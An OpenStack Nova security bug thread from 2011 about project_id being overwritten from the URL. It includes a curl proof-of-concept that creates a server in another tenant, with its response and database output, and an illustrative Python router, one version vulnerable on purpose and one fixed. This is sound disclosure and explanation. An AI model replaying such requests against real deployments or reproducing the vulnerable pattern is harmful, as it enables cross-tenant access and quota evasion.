>ttx
I'm ok with not disclosing this in the next two
weeks. Rohit, Ravi and I found this bug.
>Vish
Thank you for your patch.
I have one question. Why do we still set project_id from the URL?
Cheers
Nati
2011/12/16 Vish Ishaya <email address hidden>:
> Comments below
>
> On Dec 16, 2011, at 1:30 PM, anotherjesse wrote:
>
>> ttx
>>
>> 1) you still need to be authenticated. The keystone middleware doesn't
>> let the request hit the router if you fail to auth.
>>
>> 2) you can issue any openstack api request against any tenant.
>>
>> Because most logic in the API uses the context (not the URL) to specify
>> the resources you are interacting with (for example list servers uses
>> the tenant from the context)
>>
>> instance_list = self.compute_api.get_all(context, search_opts=search_opts)
>>
>> https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/servers.py#L145
>>
>> So you can create a server in another project but delete, list, show
>> (and most other api calls) will not be able to modify it via the api.
>> This is because the way that the database layer is written is defensive
>> - it only lets you access data that your context says you have access
>> to.
>>
>> This is still bad in that it allows creation of resources outside of
>> your project (for quota/billing avoidance) and there could be more
>> tunnels.
>
> I believe this is incorrect. The broken code actually sets context.project_id to whatever was in the url, so I think you can list and terminate instances in other projects as well.
>>
>> 3) only affects you if you are using the openstack api with keystone (not
>> deprecated auth)
>>
>> It shouldn't affect people who use the default (which is nova's internal
>> legacy auth) or who use the ec2 api
>
> legacy auth is also broken afaik, because it will successfully authenticate and then the authentication will be overwritten by the url. EC2 auth shouldn't be affected.
>>
>> --
>> You received this bug notification because you are a member of Nova
>> Core, which is subscribed to the bug report.
>> https://bugs.launchpad.net/bugs/904072
>>
>> Title:
>> project_id could be overwritten to any value by URI value
>>
>> Status in OpenStack Compute (Nova):
>> Confirmed
>>
>> Bug description:
>> project_id could be overwritten to any value by URI value.
>> A user can create a server in any project (even if it does not exist).
>> The quota function will not work because of this bug. (So this bug is a security vulnerability.)
>>
>> --Test condition
>> user : demo (not admin)
>> project_id: 2
>>
>> -- Request
>> stack@freecloud116:~/devstack$ curl -H "Content-type: application/json" -H "x-auth-token: 8bbdb554-a671-446e-a6c2-07326eeb9ad5" -d '{"server": {"min_count": 1, "flavorRef": "1", "name": "test5", "imageRef": "2", "max_count": 1}}' http://localhost:8774/v1.1/tushar2/servers <-- invalid tenant_id
>>
>> -- Response
>> {"server": {"status": "BUILD", "updated": "2011-12-14T03:06:04Z", "hostId": "", "user_id": "demo", "name": "test5", "links": [{"href": "http://localhost:8774/v1.1/tushar2/servers/7", "rel": "self"}, {"href": "http://localhost:8774/tushar2/servers/7", "rel": "bookmark"}], "addresses": {}, "tenant_id": "tushar2", "image": {"id": "2", "links": [{"href": "http://localhost:8774/tushar2/images/2", "rel": "bookmark"}]}, "created": "2011-12-14T03:06:04Z", "uuid": "5b63c965-8966-4ebc-ae1b-1c1c551a044c", "accessIPv4": "", "accessIPv6": "", "key_name": null, "adminPass": "id8SngCb7xeRq67K", "progress": 0, "flavor": {"id": "1", "links": [{"href": "http://localhost:8774/tushar2/flavors/1", "rel": "bookmark"}]}, "config_drive": "", "id": 7, "metadata": {}}}stack@freecloud116:~/devstack$
>>
>> -- DB result
>> instance with project_id "tushar2" is created
>>
>> mysql> select id,project_id from instances;
>> +----+------------+
>> | id | project_id |
>> +----+------------+
>> |  1 | demo5      |
>> |  2 | demo5      |
>> |  3 | tushar     |
>> |  4 | tushar1    |
>> |  5 | tushar2    |
>> |  6 | tushar2    |
>> |  7 | tushar2    |
>> +----+------------+
>> 7 rows in set (0.00 sec)
>>
>> --Cause of this bug
>> This code sets project_id on the request object from the URI
>> https://github.com/openstack/nova/blob/master/nova/api/openstack/v2/__init__.py#L78
>>
>> Then this code sets the project_id on the context object
>> https://github.com/openstack/nova/blob/master/nova/api/openstack/wsgi.py#L554
>>
>> To manage notifications about this bug go to:
>> https://bugs.launchpad.net/nova/+bug/904072/+subscriptions
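As an added illustration (not Nova's code, and not the fix that was applied to the project), the following Python models the two behaviours argued about above: a router that lets the tenant segment of the URL overwrite the authenticated context's project_id, and the hardened variant that parses the URL tenant but rejects any mismatch with the tenant the token was issued for. The token table, path regex and all function names are constructed for this example.

```python
import re
from dataclasses import dataclass

# Constructed stand-in for Keystone's validated token -> (user, project) mapping.
TOKEN_DB = {"tok-demo": ("demo", "demo5")}
# Path shape used by the request in the bug report: /v1.1/<tenant>/<resource>
URL_RE = re.compile(r"^/v1\.1/(?P<project_id>[^/]+)/(?P<resource>.*)$")

@dataclass
class RequestContext:
    user_id: str
    project_id: str

class AuthError(Exception): pass  # would map to HTTP 401/403

def authenticate(token):
    """Stand-in for the auth middleware: validated token -> context."""
    if token not in TOKEN_DB:
        raise AuthError("invalid token")
    return RequestContext(*TOKEN_DB[token])

def tenant_from_path(path):
    """Tenant segment of the URL; the router needs it, but it is caller-controlled."""
    match = URL_RE.match(path)
    if match is None:
        raise AuthError("unroutable path")
    return match.group("project_id")

def route_vulnerable(token, path):
    """Bug as described: the URL tenant overwrites the token's project_id."""
    ctx = authenticate(token)
    ctx.project_id = tenant_from_path(path)  # caller-controlled value wins
    return ctx

def route_fixed(token, path):
    """Fix: URL tenant must equal the token's tenant; a mismatch is rejected."""
    ctx = authenticate(token)
    url_project = tenant_from_path(path)
    if url_project != ctx.project_id:
        raise AuthError(f"URL tenant {url_project!r} != token tenant {ctx.project_id!r}")
    return ctx

def is_rejected(router, token, path):
    try:
        router(token, path)
        return False
    except AuthError:
        return True
```

With the fixed router the URL tenant still drives routing, but every downstream check runs with the project_id the token was actually issued for.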